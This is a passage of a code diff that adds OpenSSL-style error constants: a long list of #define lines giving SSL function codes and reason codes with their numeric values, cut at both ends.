+# define SSL_F_SERVER_VERIFY                              240
+# define SSL_F_SSL23_ACCEPT                               115
+# define SSL_F_SSL23_CLIENT_HELLO                         116
+# define SSL_F_SSL23_CONNECT                              117
+# define SSL_F_SSL23_GET_CLIENT_HELLO                     118
+# define SSL_F_SSL23_GET_SERVER_HELLO                     119
+# define SSL_F_SSL23_PEEK                                 237
+# define SSL_F_SSL23_READ                                 120
+# define SSL_F_SSL23_WRITE                                121
+# define SSL_F_SSL2_ACCEPT                                122
+# define SSL_F_SSL2_CONNECT                               123
+# define SSL_F_SSL2_ENC_INIT                              124
+# define SSL_F_SSL2_GENERATE_KEY_MATERIAL                 241
+# define SSL_F_SSL2_PEEK                                  234
+# define SSL_F_SSL2_READ                                  125
+# define SSL_F_SSL2_READ_INTERNAL                         236
+# define SSL_F_SSL2_SET_CERTIFICATE                       126
+# define SSL_F_SSL2_WRITE                                 127
+# define SSL_F_SSL3_ACCEPT                                128
+# define SSL_F_SSL3_ADD_CERT_TO_BUF                       296
+# define SSL_F_SSL3_CALLBACK_CTRL                         233
+# define SSL_F_SSL3_CHANGE_CIPHER_STATE                   129
+# define SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM              130
+# define SSL_F_SSL3_CHECK_CLIENT_HELLO                    304
+# define SSL_F_SSL3_CLIENT_HELLO                          131
+# define SSL_F_SSL3_CONNECT                               132
+# define SSL_F_SSL3_CTRL                                  213
+# define SSL_F_SSL3_CTX_CTRL                              133
+# define SSL_F_SSL3_DIGEST_CACHED_RECORDS                 293
+# define SSL_F_SSL3_DO_CHANGE_CIPHER_SPEC                 292
+# define SSL_F_SSL3_ENC                                   134
+# define SSL_F_SSL3_GENERATE_KEY_BLOCK                    238
+# define SSL_F_SSL3_GET_CERTIFICATE_REQUEST               135
+# define SSL_F_SSL3_GET_CERT_STATUS                       289
+# define SSL_F_SSL3_GET_CERT_VERIFY                       136
+# define SSL_F_SSL3_GET_CLIENT_CERTIFICATE                137
+# define SSL_F_SSL3_GET_CLIENT_HELLO                      138
+# define SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE               139
+# define SSL_F_SSL3_GET_FINISHED                          140
+# define SSL_F_SSL3_GET_KEY_EXCHANGE                      141
+# define SSL_F_SSL3_GET_MESSAGE                           142
+# define SSL_F_SSL3_GET_NEW_SESSION_TICKET                283
+# define SSL_F_SSL3_GET_NEXT_PROTO                        306
+# define SSL_F_SSL3_GET_RECORD                            143
+# define SSL_F_SSL3_GET_SERVER_CERTIFICATE                144
+# define SSL_F_SSL3_GET_SERVER_DONE                       145
+# define SSL_F_SSL3_GET_SERVER_HELLO                      146
+# define SSL_F_SSL3_HANDSHAKE_MAC                         285
+# define SSL_F_SSL3_NEW_SESSION_TICKET                    287
+# define SSL_F_SSL3_OUTPUT_CERT_CHAIN                     147
+# define SSL_F_SSL3_PEEK                                  235
+# define SSL_F_SSL3_READ_BYTES                            148
+# define SSL_F_SSL3_READ_N                                149
+# define SSL_F_SSL3_SEND_CERTIFICATE_REQUEST              150
+# define SSL_F_SSL3_SEND_CLIENT_CERTIFICATE               151
+# define SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE              152
+# define SSL_F_SSL3_SEND_CLIENT_VERIFY                    153
+# define SSL_F_SSL3_SEND_SERVER_CERTIFICATE               154
+# define SSL_F_SSL3_SEND_SERVER_HELLO                     242
+# define SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE              155
+# define SSL_F_SSL3_SETUP_KEY_BLOCK                       157
+# define SSL_F_SSL3_SETUP_READ_BUFFER                     156
+# define SSL_F_SSL3_SETUP_WRITE_BUFFER                    291
+# define SSL_F_SSL3_WRITE_BYTES                           158
+# define SSL_F_SSL3_WRITE_PENDING                         159
+# define SSL_F_SSL_ADD_CERT_CHAIN                         318
+# define SSL_F_SSL_ADD_CERT_TO_BUF                        319
+# define SSL_F_SSL_ADD_CLIENTHELLO_RENEGOTIATE_EXT        298
+# define SSL_F_SSL_ADD_CLIENTHELLO_TLSEXT                 277
+# define SSL_F_SSL_ADD_CLIENTHELLO_USE_SRTP_EXT           307
+# define SSL_F_SSL_ADD_DIR_CERT_SUBJECTS_TO_STACK         215
+# define SSL_F_SSL_ADD_FILE_CERT_SUBJECTS_TO_STACK        216
+# define SSL_F_SSL_ADD_SERVERHELLO_RENEGOTIATE_EXT        299
+# define SSL_F_SSL_ADD_SERVERHELLO_TLSEXT                 278
+# define SSL_F_SSL_ADD_SERVERHELLO_USE_SRTP_EXT           308
+# define SSL_F_SSL_BAD_METHOD                             160
+# define SSL_F_SSL_BUILD_CERT_CHAIN                       332
+# define SSL_F_SSL_BYTES_TO_CIPHER_LIST                   161
+# define SSL_F_SSL_CERT_DUP                               221
+# define SSL_F_SSL_CERT_INST                              222
+# define SSL_F_SSL_CERT_INSTANTIATE                       214
+# define SSL_F_SSL_CERT_NEW                               162
+# define SSL_F_SSL_CHECK_PRIVATE_KEY                      163
+# define SSL_F_SSL_CHECK_SERVERHELLO_TLSEXT               280
+# define SSL_F_SSL_CHECK_SRVR_ECC_CERT_AND_ALG            279
+# define SSL_F_SSL_CIPHER_PROCESS_RULESTR                 230
+# define SSL_F_SSL_CIPHER_STRENGTH_SORT                   231
+# define SSL_F_SSL_CLEAR                                  164
+# define SSL_F_SSL_COMP_ADD_COMPRESSION_METHOD            165
+# define SSL_F_SSL_CONF_CMD                               334
+# define SSL_F_SSL_CREATE_CIPHER_LIST                     166
+# define SSL_F_SSL_CTRL                                   232
+# define SSL_F_SSL_CTX_CHECK_PRIVATE_KEY                  168
+# define SSL_F_SSL_CTX_MAKE_PROFILES                      309
+# define SSL_F_SSL_CTX_NEW                                169
+# define SSL_F_SSL_CTX_SET_CIPHER_LIST                    269
+# define SSL_F_SSL_CTX_SET_CLIENT_CERT_ENGINE             290
+# define SSL_F_SSL_CTX_SET_PURPOSE                        226
+# define SSL_F_SSL_CTX_SET_SESSION_ID_CONTEXT             219
+# define SSL_F_SSL_CTX_SET_SSL_VERSION                    170
+# define SSL_F_SSL_CTX_SET_TRUST                          229
+# define SSL_F_SSL_CTX_USE_CERTIFICATE                    171
+# define SSL_F_SSL_CTX_USE_CERTIFICATE_ASN1               172
+# define SSL_F_SSL_CTX_USE_CERTIFICATE_CHAIN_FILE         220
+# define SSL_F_SSL_CTX_USE_CERTIFICATE_FILE               173
+# define SSL_F_SSL_CTX_USE_PRIVATEKEY                     174
+# define SSL_F_SSL_CTX_USE_PRIVATEKEY_ASN1                175
+# define SSL_F_SSL_CTX_USE_PRIVATEKEY_FILE                176
+# define SSL_F_SSL_CTX_USE_PSK_IDENTITY_HINT              272
+# define SSL_F_SSL_CTX_USE_RSAPRIVATEKEY                  177
+# define SSL_F_SSL_CTX_USE_RSAPRIVATEKEY_ASN1             178
+# define SSL_F_SSL_CTX_USE_RSAPRIVATEKEY_FILE             179
+# define SSL_F_SSL_CTX_USE_SERVERINFO                     336
+# define SSL_F_SSL_CTX_USE_SERVERINFO_FILE                337
+# define SSL_F_SSL_DO_HANDSHAKE                           180
+# define SSL_F_SSL_GET_NEW_SESSION                        181
+# define SSL_F_SSL_GET_PREV_SESSION                       217
+# define SSL_F_SSL_GET_SERVER_CERT_INDEX                  322
+# define SSL_F_SSL_GET_SERVER_SEND_CERT                   182
+# define SSL_F_SSL_GET_SERVER_SEND_PKEY                   317
+# define SSL_F_SSL_GET_SIGN_PKEY                          183
+# define SSL_F_SSL_INIT_WBIO_BUFFER                       184
+# define SSL_F_SSL_LOAD_CLIENT_CA_FILE                    185
+# define SSL_F_SSL_NEW                                    186
+# define SSL_F_SSL_PARSE_CLIENTHELLO_RENEGOTIATE_EXT      300
+# define SSL_F_SSL_PARSE_CLIENTHELLO_TLSEXT               302
+# define SSL_F_SSL_PARSE_CLIENTHELLO_USE_SRTP_EXT         310
+# define SSL_F_SSL_PARSE_SERVERHELLO_RENEGOTIATE_EXT      301
+# define SSL_F_SSL_PARSE_SERVERHELLO_TLSEXT               303
+# define SSL_F_SSL_PARSE_SERVERHELLO_USE_SRTP_EXT         311
+# define SSL_F_SSL_PEEK                                   270
+# define SSL_F_SSL_PREPARE_CLIENTHELLO_TLSEXT             281
+# define SSL_F_SSL_PREPARE_SERVERHELLO_TLSEXT             282
+# define SSL_F_SSL_READ                                   223
+# define SSL_F_SSL_RSA_PRIVATE_DECRYPT                    187
+# define SSL_F_SSL_RSA_PUBLIC_ENCRYPT                     188
+# define SSL_F_SSL_SCAN_CLIENTHELLO_TLSEXT                320
+# define SSL_F_SSL_SCAN_SERVERHELLO_TLSEXT                321
+# define SSL_F_SSL_SESSION_NEW                            189
+# define SSL_F_SSL_SESSION_PRINT_FP                       190
+# define SSL_F_SSL_SESSION_SET1_ID_CONTEXT                312
+# define SSL_F_SSL_SESS_CERT_NEW                          225
+# define SSL_F_SSL_SET_CERT                               191
+# define SSL_F_SSL_SET_CIPHER_LIST                        271
+# define SSL_F_SSL_SET_FD                                 192
+# define SSL_F_SSL_SET_PKEY                               193
+# define SSL_F_SSL_SET_PURPOSE                            227
+# define SSL_F_SSL_SET_RFD                                194
+# define SSL_F_SSL_SET_SESSION                            195
+# define SSL_F_SSL_SET_SESSION_ID_CONTEXT                 218
+# define SSL_F_SSL_SET_SESSION_TICKET_EXT                 294
+# define SSL_F_SSL_SET_TRUST                              228
+# define SSL_F_SSL_SET_WFD                                196
+# define SSL_F_SSL_SHUTDOWN                               224
+# define SSL_F_SSL_SRP_CTX_INIT                           313
+# define SSL_F_SSL_UNDEFINED_CONST_FUNCTION               243
+# define SSL_F_SSL_UNDEFINED_FUNCTION                     197
+# define SSL_F_SSL_UNDEFINED_VOID_FUNCTION                244
+# define SSL_F_SSL_USE_CERTIFICATE                        198
+# define SSL_F_SSL_USE_CERTIFICATE_ASN1                   199
+# define SSL_F_SSL_USE_CERTIFICATE_FILE                   200
+# define SSL_F_SSL_USE_PRIVATEKEY                         201
+# define SSL_F_SSL_USE_PRIVATEKEY_ASN1                    202
+# define SSL_F_SSL_USE_PRIVATEKEY_FILE                    203
+# define SSL_F_SSL_USE_PSK_IDENTITY_HINT                  273
+# define SSL_F_SSL_USE_RSAPRIVATEKEY                      204
+# define SSL_F_SSL_USE_RSAPRIVATEKEY_ASN1                 205
+# define SSL_F_SSL_USE_RSAPRIVATEKEY_FILE                 206
+# define SSL_F_SSL_VERIFY_CERT_CHAIN                      207
+# define SSL_F_SSL_WRITE                                  208
+# define SSL_F_TLS12_CHECK_PEER_SIGALG                    333
+# define SSL_F_TLS1_CERT_VERIFY_MAC                       286
+# define SSL_F_TLS1_CHANGE_CIPHER_STATE                   209
+# define SSL_F_TLS1_CHECK_SERVERHELLO_TLSEXT              274
+# define SSL_F_TLS1_ENC                                   210
+# define SSL_F_TLS1_EXPORT_KEYING_MATERIAL                314
+# define SSL_F_TLS1_GET_CURVELIST                         338
+# define SSL_F_TLS1_HEARTBEAT                             315
+# define SSL_F_TLS1_PREPARE_CLIENTHELLO_TLSEXT            275
+# define SSL_F_TLS1_PREPARE_SERVERHELLO_TLSEXT            276
+# define SSL_F_TLS1_PRF                                   284
+# define SSL_F_TLS1_SETUP_KEY_BLOCK                       211
+# define SSL_F_TLS1_SET_SERVER_SIGALGS                    335
+# define SSL_F_WRITE_PENDING                              212
+
+/* Reason codes. */
+# define SSL_R_APP_DATA_IN_HANDSHAKE                      100
+# define SSL_R_ATTEMPT_TO_REUSE_SESSION_IN_DIFFERENT_CONTEXT 272
+# define SSL_R_BAD_ALERT_RECORD                           101
+# define SSL_R_BAD_AUTHENTICATION_TYPE                    102
+# define SSL_R_BAD_CHANGE_CIPHER_SPEC                     103
+# define SSL_R_BAD_CHECKSUM                               104
+# define SSL_R_BAD_DATA                                   390
+# define SSL_R_BAD_DATA_RETURNED_BY_CALLBACK              106
+# define SSL_R_BAD_DECOMPRESSION                          107
+# define SSL_R_BAD_DH_G_LENGTH                            108
+# define SSL_R_BAD_DH_PUB_KEY_LENGTH                      109
+# define SSL_R_BAD_DH_P_LENGTH                            110
+# define SSL_R_BAD_DIGEST_LENGTH                          111
+# define SSL_R_BAD_DSA_SIGNATURE                          112
+# define SSL_R_BAD_ECC_CERT                               304
+# define SSL_R_BAD_ECDSA_SIGNATURE                        305
+# define SSL_R_BAD_ECPOINT                                306
+# define SSL_R_BAD_HANDSHAKE_LENGTH                       332
+# define SSL_R_BAD_HELLO_REQUEST                          105
+# define SSL_R_BAD_LENGTH                                 271
+# define SSL_R_BAD_MAC_DECODE                             113
+# define SSL_R_BAD_MAC_LENGTH                             333
+# define SSL_R_BAD_MESSAGE_TYPE                           114
+# define SSL_R_BAD_PACKET_LENGTH                          115
+# define SSL_R_BAD_PROTOCOL_VERSION_NUMBER                116
+# define SSL_R_BAD_PSK_IDENTITY_HINT_LENGTH               316
+# define SSL_R_BAD_RESPONSE_ARGUMENT                      117
+# define SSL_R_BAD_RSA_DECRYPT                            118
+# define SSL_R_BAD_RSA_ENCRYPT                            119
+# define SSL_R_BAD_RSA_E_LENGTH                           120
+# define SSL_R_BAD_RSA_MODULUS_LENGTH                     121
+# define SSL_R_BAD_RSA_SIGNATURE                          122
+# define SSL_R_BAD_SIGNATURE                              123
+# define SSL_R_BAD_SRP_A_LENGTH                           347
+# define SSL_R_BAD_SRP_B_LENGTH                           348
+# define SSL_R_BAD_SRP_G_LENGTH                           349
+# define SSL_R_BAD_SRP_N_LENGTH                           350
+# define SSL_R_BAD_SRP_PARAMETERS                         371
+# define SSL_R_BAD_SRP_S_LENGTH                           351
+# define SSL_R_BAD_SRTP_MKI_VALUE                         352
+# define SSL_R_BAD_SRTP_PROTECTION_PROFILE_LIST           353
+# define SSL_R_BAD_SSL_FILETYPE                           124
+# define SSL_R_BAD_SSL_SESSION_ID_LENGTH                  125
+# define SSL_R_BAD_STATE                                  126
+# define SSL_R_BAD_VALUE                                  384
+# define SSL_R_BAD_WRITE_RETRY                            127
+# define SSL_R_BIO_NOT_SET                                128
+# define SSL_R_BLOCK_CIPHER_PAD_IS_WRONG                  129
+# define SSL_R_BN_LIB                                     130
+# define SSL_R_CA_DN_LENGTH_MISMATCH                      131
+# define SSL_R_CA_DN_TOO_LONG                             132
+# define SSL_R_CCS_RECEIVED_EARLY                         133
+# define SSL_R_CERTIFICATE_VERIFY_FAILED                  134
+# define SSL_R_CERT_CB_ERROR                              377
+# define SSL_R_CERT_LENGTH_MISMATCH                       135
+# define SSL_R_CHALLENGE_IS_DIFFERENT                     136
+# define SSL_R_CIPHER_CODE_WRONG_LENGTH                   137
+# define SSL_R_CIPHER_OR_HASH_UNAVAILABLE                 138
+# define SSL_R_CIPHER_TABLE_SRC_ERROR                     139
+# define SSL_R_CLIENTHELLO_TLSEXT                         226
+# define SSL_R_COMPRESSED_LENGTH_TOO_LONG                 140
+# define SSL_R_COMPRESSION_DISABLED                       343
+# define SSL_R_COMPRESSION_FAILURE                        141
+# define SSL_R_COMPRESSION_ID_NOT_WITHIN_PRIVATE_RANGE    307
+# define SSL_R_COMPRESSION_LIBRARY_ERROR                  142
+# define SSL_R_CONNECTION_ID_IS_DIFFERENT                 143
+# define SSL_R_CONNECTION_TYPE_NOT_SET                    144
+# define SSL_R_COOKIE_MISMATCH                            308
+# define SSL_R_DATA_BETWEEN_CCS_AND_FINISHED              145
+# define SSL_R_DATA_LENGTH_TOO_LONG                       146
+# define SSL_R_DECRYPTION_FAILED                          147
+# define SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC        281
+# define SSL_R_DH_PUBLIC_VALUE_LENGTH_IS_WRONG            148
+# define SSL_R_DIGEST_CHECK_FAILED                        149
+# define SSL_R_DTLS_MESSAGE_TOO_BIG                       334
+# define SSL_R_DUPLICATE_COMPRESSION_ID                   309
+# define SSL_R_ECC_CERT_NOT_FOR_KEY_AGREEMENT             317
+# define SSL_R_ECC_CERT_NOT_FOR_SIGNING                   318
+# define SSL_R_ECC_CERT_SHOULD_HAVE_RSA_SIGNATURE         322
+# define SSL_R_ECC_CERT_SHOULD_HAVE_SHA1_SIGNATURE        323
+# define SSL_R_ECDH_REQUIRED_FOR_SUITEB_MODE              374
+# define SSL_R_ECGROUP_TOO_LARGE_FOR_CIPHER               310
+# define SSL_R_EMPTY_SRTP_PROTECTION_PROFILE_LIST         354
+# define SSL_R_ENCRYPTED_LENGTH_TOO_LONG                  150
+# define SSL_R_ERROR_GENERATING_TMP_RSA_KEY               282
+# define SSL_R_ERROR_IN_RECEIVED_CIPHER_LIST              151
+# define SSL_R_EXCESSIVE_MESSAGE_SIZE                     152
+# define SSL_R_EXTRA_DATA_IN_MESSAGE                      153
+# define SSL_R_GOT_A_FIN_BEFORE_A_CCS                     154
+# define SSL_R_GOT_NEXT_PROTO_BEFORE_A_CCS                355
+# define SSL_R_GOT_NEXT_PROTO_WITHOUT_EXTENSION           356
+# define SSL_R_HTTPS_PROXY_REQUEST                        155
+# define SSL_R_HTTP_REQUEST                               156
+# define SSL_R_ILLEGAL_PADDING                            283
+# define SSL_R_ILLEGAL_SUITEB_DIGEST                      380
+# define SSL_R_INAPPROPRIATE_FALLBACK                     373
+# define SSL_R_INCONSISTENT_COMPRESSION                   340
+# define SSL_R_INVALID_CHALLENGE_LENGTH                   158
+# define SSL_R_INVALID_COMMAND                            280
+# define SSL_R_INVALID_COMPRESSION_ALGORITHM              341
+# define SSL_R_INVALID_NULL_CMD_NAME                      385
+# define SSL_R_INVALID_PURPOSE                            278
+# define SSL_R_INVALID_SERVERINFO_DATA                    388
+# define SSL_R_INVALID_SRP_USERNAME                       357
+# define SSL_R_INVALID_STATUS_RESPONSE                    328
+# define SSL_R_INVALID_TICKET_KEYS_LENGTH                 325
+# define SSL_R_INVALID_TRUST                              279
+# define SSL_R_KEY_ARG_TOO_LONG                           284
+# define SSL_R_KRB5                                       285
+# define SSL_R_KRB5_C_CC_PRINC                            286
+# define SSL_R_KRB5_C_GET_CRED                            287
+# define SSL_R_KRB5_C_INIT                                288
+# define SSL_R_KRB5_C_MK_REQ                              289
+# define SSL_R_KRB5_S_BAD_TICKET                          290
+# define SSL_R_KRB5_S_INIT                                291
+# define SSL_R_KRB5_S_RD_REQ                              292
+# define SSL_R_KRB5_S_TKT_EXPIRED                         293
+# define SSL_R_KRB5_S_TKT_NYV                             294
+# define SSL_R_KRB5_S_TKT_SKEW                            295
+# define SSL_R_LENGTH_MISMATCH                            159
+# define SSL_R_LENGTH_TOO_SHORT                           160
+# define SSL_R_LIBRARY_BUG                                274
+# define SSL_R_LIBRARY_HAS_NO_CIPHERS                     161
+# define SSL_R_MESSAGE_TOO_LONG                           296
+# define SSL_R_MISSING_DH_DSA_CERT                        162
+# define SSL_R_MISSING_DH_KEY                             163
+# define SSL_R_MISSING_DH_RSA_CERT                        164
+# define SSL_R_MISSING_DSA_SIGNING_CERT                   165
+# define SSL_R_MISSING_ECDH_CERT                          382
+# define SSL_R_MISSING_ECDSA_SIGNING_CERT                 381
+# define SSL_R_MISSING_EXPORT_TMP_DH_KEY                  166
+# define SSL_R_MISSING_EXPORT_TMP_RSA_KEY                 167
+# define SSL_R_MISSING_RSA_CERTIFICATE                    168
+# define SSL_R_MISSING_RSA_ENCRYPTING_CERT                169
+# define SSL_R_MISSING_RSA_SIGNING_CERT                   170
+# define SSL_R_MISSING_SRP_PARAM                          358
+# define SSL_R_MISSING_TMP_DH_KEY                         171
+# define SSL_R_MISSING_TMP_ECDH_KEY                       311
+# define SSL_R_MISSING_TMP_RSA_KEY                        172
+# define SSL_R_MISSING_TMP_RSA_PKEY                       173
+# define SSL_R_MISSING_VERIFY_MESSAGE                     174
+# define SSL_R_MULTIPLE_SGC_RESTARTS                      346
+# define SSL_R_NON_SSLV2_INITIAL_PACKET                   175
+# define SSL_R_NO_CERTIFICATES_RETURNED                   176
+# define SSL_R_NO_CERTIFICATE_ASSIGNED                    177
+# define SSL_R_NO_CERTIFICATE_RETURNED                    178
+# define SSL_R_NO_CERTIFICATE_SET                         179
+# define SSL_R_NO_CERTIFICATE_SPECIFIED                   180
+# define SSL_R_NO_CIPHERS_AVAILABLE                       181
+# define SSL_R_NO_CIPHERS_PASSED                          182
+# define SSL_R_NO_CIPHERS_SPECIFIED                       183
+# define SSL_R_NO_CIPHER_LIST                             184
+# define SSL_R_NO_CIPHER_MATCH                            185
+# define SSL_R_NO_CLIENT_CERT_METHOD                      331
+# define SSL_R_NO_CLIENT_CERT_RECEIVED                    186
+# define SSL_R_NO_COMPRESSION_SPECIFIED                   187
+# define SSL_R_NO_GOST_CERTIFICATE_SENT_BY_PEER           330
+# define SSL_R_NO_METHOD_SPECIFIED                        188
+# define SSL_R_NO_PEM_EXTENSIONS                          389
+# define SSL_R_NO_PRIVATEKEY                              189
+# define SSL_R_NO_PRIVATE_KEY_ASSIGNED                    190
+# define SSL_R_NO_PROTOCOLS_AVAILABLE                     191
+# define SSL_R_NO_PUBLICKEY                               192
+# define SSL_R_NO_RENEGOTIATION                           339
+# define SSL_R_NO_REQUIRED_DIGEST                         324
+# define SSL_R_NO_SHARED_CIPHER                           193
+# define SSL_R_NO_SHARED_SIGATURE_ALGORITHMS              376
+# define SSL_R_NO_SRTP_PROFILES                           359
+# define SSL_R_NO_VERIFY_CALLBACK                         194
+# define SSL_R_NULL_SSL_CTX                               195
+# define SSL_R_NULL_SSL_METHOD_PASSED                     196
+# define SSL_R_OLD_SESSION_CIPHER_NOT_RETURNED            197
+# define SSL_R_OLD_SESSION_COMPRESSION_ALGORITHM_NOT_RETURNED 344
+# define SSL_R_ONLY_DTLS_1_2_ALLOWED_IN_SUITEB_MODE       387
+# define SSL_R_ONLY_TLS_1_2_ALLOWED_IN_SUITEB_MODE        379
+# define SSL_R_ONLY_TLS_ALLOWED_IN_FIPS_MODE              297
+# define SSL_R_OPAQUE_PRF_INPUT_TOO_LONG                  327
+# define SSL_R_PACKET_LENGTH_TOO_LONG                     198
+# define SSL_R_PARSE_TLSEXT                               227
+# define SSL_R_PATH_TOO_LONG                              270
+# define SSL_R_PEER_DID_NOT_RETURN_A_CERTIFICATE          199
+# define SSL_R_PEER_ERROR                                 200
+# define SSL_R_PEER_ERROR_CERTIFICATE                     201
+# define SSL_R_PEER_ERROR_NO_CERTIFICATE                  202
+# define SSL_R_PEER_ERROR_NO_CIPHER                       203
+# define SSL_R_PEER_ERROR_UNSUPPORTED_CERTIFICATE_TYPE    204
+# define SSL_R_PEM_NAME_BAD_PREFIX                        391
+# define SSL_R_PEM_NAME_TOO_SHORT                         392
+# define SSL_R_PRE_MAC_LENGTH_TOO_LONG                    205
+# define SSL_R_PROBLEMS_MAPPING_CIPHER_FUNCTIONS          206
+# define SSL_R_PROTOCOL_IS_SHUTDOWN                       207
+# define SSL_R_PSK_IDENTITY_NOT_FOUND                     223
+# define SSL_R_PSK_NO_CLIENT_CB                           224
+# define SSL_R_PSK_NO_SERVER_CB                           225
+# define SSL_R_PUBLIC_KEY_ENCRYPT_ERROR                   208
+# define SSL_R_PUBLIC_KEY_IS_NOT_RSA                      209
+# define SSL_R_PUBLIC_KEY_NOT_RSA                         210
+# define SSL_R_READ_BIO_NOT_SET                           211
+# define SSL_R_READ_TIMEOUT_EXPIRED                       312
+# define SSL_R_READ_WRONG_PACKET_TYPE                     212
+# define SSL_R_RECORD_LENGTH_MISMATCH                     213
+# define SSL_R_RECORD_TOO_LARGE                           214
+# define SSL_R_RECORD_TOO_SMALL                           298
+# define SSL_R_RENEGOTIATE_EXT_TOO_LONG                   335
+# define SSL_R_RENEGOTIATION_ENCODING_ERR                 336
+# define SSL_R_RENEGOTIATION_MISMATCH                     337
+# define SSL_R_REQUIRED_CIPHER_MISSING                    215
+# define SSL_R_REQUIRED_COMPRESSSION_ALGORITHM_MISSING    342
+# define SSL_R_REUSE_CERT_LENGTH_NOT_ZERO                 216
+# define SSL_R_REUSE_CERT_TYPE_NOT_ZERO                   217
+# define SSL_R_REUSE_CIPHER_LIST_NOT_ZERO                 218
+# define SSL_R_SCSV_RECEIVED_WHEN_RENEGOTIATING           345
+# define SSL_R_SERVERHELLO_TLSEXT                         275
+# define SSL_R_SESSION_ID_CONTEXT_UNINITIALIZED           277
+# define SSL_R_SHORT_READ                                 219
+# define SSL_R_SIGNATURE_ALGORITHMS_ERROR                 360
+# define SSL_R_SIGNATURE_FOR_NON_SIGNING_CERTIFICATE      220
+# define SSL_R_SRP_A_CALC                                 361
+# define SSL_R_SRTP_COULD_NOT_ALLOCATE_PROFILES           362
+# define SSL_R_SRTP_PROTECTION_PROFILE_LIST_TOO_LONG      363
+# define SSL_R_SRTP_UNKNOWN_PROTECTION_PROFILE            364
+# define SSL_R_SSL23_DOING_SESSION_ID_REUSE               221
+# define SSL_R_SSL2_CONNECTION_ID_TOO_LONG                299
+# define SSL_R_SSL3_EXT_INVALID_ECPOINTFORMAT             321
+# define SSL_R_SSL3_EXT_INVALID_SERVERNAME                319
+# define SSL_R_SSL3_EXT_INVALID_SERVERNAME_TYPE           320
+# define SSL_R_SSL3_SESSION_ID_TOO_LONG                   300
+# define SSL_R_SSL3_SESSION_ID_TOO_SHORT                  222
+# define SSL_R_SSLV3_ALERT_BAD_CERTIFICATE                1042
+# define SSL_R_SSLV3_ALERT_BAD_RECORD_MAC                 1020
+# define SSL_R_SSLV3_ALERT_CERTIFICATE_EXPIRED            1045
+# define SSL_R_SSLV3_ALERT_CERTIFICATE_REVOKED            1044
+# define SSL_R_SSLV3_ALERT_CERTIFICATE_UNKNOWN            1046
+# define SSL_R_SSLV3_ALERT_DECOMPRESSION_FAILURE          1030
+# define SSL_R_SSLV3_ALERT_HANDSHAKE_FAILURE              1040
+# define SSL_R_SSLV3_ALERT_ILLEGAL_PARAMETER              1047
+# define SSL_R_SSLV3_ALERT_NO_CERTIFICATE                 1041
+# define SSL_R_SSLV3_ALERT_UNEXPECTED_MESSAGE             1010
+# define SSL_R_SSLV3_ALERT_UNSUPPORTED_CERTIFICATE        1043
+# define SSL_R_SSL_CTX_HAS_NO_DEFAULT_SSL_VERSION         228
+# define SSL_R_SSL_HANDSHAKE_FAILURE                      229
+# define SSL_R_SSL_LIBRARY_HAS_NO_CIPHERS                 230
+# define SSL_R_SSL_SESSION_ID_CALLBACK_FAILED             301
+# define SSL_R_SSL_SESSION_ID_CONFLICT                    302
+# define SSL_R_SSL_SESSION_ID_CONTEXT_TOO_LONG            273
+# define SSL_R_SSL_SESSION_ID_HAS_BAD_LENGTH              303
+# define SSL_R_SSL_SESSION_ID_IS_DIFFERENT                231
+# define SSL_R_TLSV1_ALERT_ACCESS_DENIED                  1049
+# define SSL_R_TLSV1_ALERT_DECODE_ERROR                   1050
+# define SSL_R_TLSV1_ALERT_DECRYPTION_FAILED              1021
+# define SSL_R_TLSV1_ALERT_DECRYPT_ERROR                  1051
+# define SSL_R_TLSV1_ALERT_EXPORT_RESTRICTION             1060
+# define SSL_R_TLSV1_ALERT_INAPPROPRIATE_FALLBACK         1086
+# define SSL_R_TLSV1_ALERT_INSUFFICIENT_SECURITY          1071
+# define SSL_R_TLSV1_ALERT_INTERNAL_ERROR                 1080
+# define SSL_R_TLSV1_ALERT_NO_RENEGOTIATION               1100
+# define SSL_R_TLSV1_ALERT_PROTOCOL_VERSION               1070
+# define SSL_R_TLSV1_ALERT_RECORD_OVERFLOW                1022
+# define SSL_R_TLSV1_ALERT_UNKNOWN_CA                     1048
+# define SSL_R_TLSV1_ALERT_USER_CANCELLED                 1090
+# define SSL_R_TLSV1_BAD_CERTIFICATE_HASH_VALUE           1114
+# define SSL_R_TLSV1_BAD_CERTIFICATE_STATUS_RESPONSE      1113
+# define SSL_R_TLSV1_CERTIFICATE_UNOBTAINABLE             1111
+# define SSL_R_TLSV1_UNRECOGNIZED_NAME                    1112
+# define SSL_R_TLSV1_UNSUPPORTED_EXTENSION                1110
+# define SSL_R_TLS_CLIENT_CERT_REQ_WITH_ANON_CIPHER       232
+# define SSL_R_TLS_HEARTBEAT_PEER_DOESNT_ACCEPT           365
+# define SSL_R_TLS_HEARTBEAT_PENDING                      366
+# define SSL_R_TLS_ILLEGAL_EXPORTER_LABEL                 367
+# define SSL_R_TLS_INVALID_ECPOINTFORMAT_LIST             157
+# define SSL_R_TLS_PEER_DID_NOT_RESPOND_WITH_CERTIFICATE_LIST 233
+# define SSL_R_TLS_RSA_ENCRYPTED_VALUE_LENGTH_IS_WRONG    234
+# define SSL_R_TRIED_TO_USE_UNSUPPORTED_CIPHER            235
+# define SSL_R_UNABLE_TO_DECODE_DH_CERTS                  236
+# define SSL_R_UNABLE_TO_DECODE_ECDH_CERTS                313
+# define SSL_R_UNABLE_TO_EXTRACT_PUBLIC_KEY               237
+# define SSL_R_UNABLE_TO_FIND_DH_PARAMETERS               238
+# define SSL_R_UNABLE_TO_FIND_ECDH_PARAMETERS             314
+# define SSL_R_UNABLE_TO_FIND_PUBLIC_KEY_PARAMETERS       239
+# define SSL_R_UNABLE_TO_FIND_SSL_METHOD                  240
+# define SSL_R_UNABLE_TO_LOAD_SSL2_MD5_ROUTINES           241
+# define SSL_R_UNABLE_TO_LOAD_SSL3_MD5_ROUTINES           242
+# define SSL_R_UNABLE_TO_LOAD_SSL3_SHA1_ROUTINES          243
+# define SSL_R_UNEXPECTED_MESSAGE                         244
+# define SSL_R_UNEXPECTED_RECORD                          245
+# define SSL_R_UNINITIALIZED                              276
+# define SSL_R_UNKNOWN_ALERT_TYPE                         246
+# define SSL_R_UNKNOWN_CERTIFICATE_TYPE                   247
+# define SSL_R_UNKNOWN_CIPHER_RETURNED                    248
+# define SSL_R_UNKNOWN_CIPHER_TYPE                        249
+# define SSL_R_UNKNOWN_CMD_NAME                           386
+# define SSL_R_UNKNOWN_DIGEST                             368
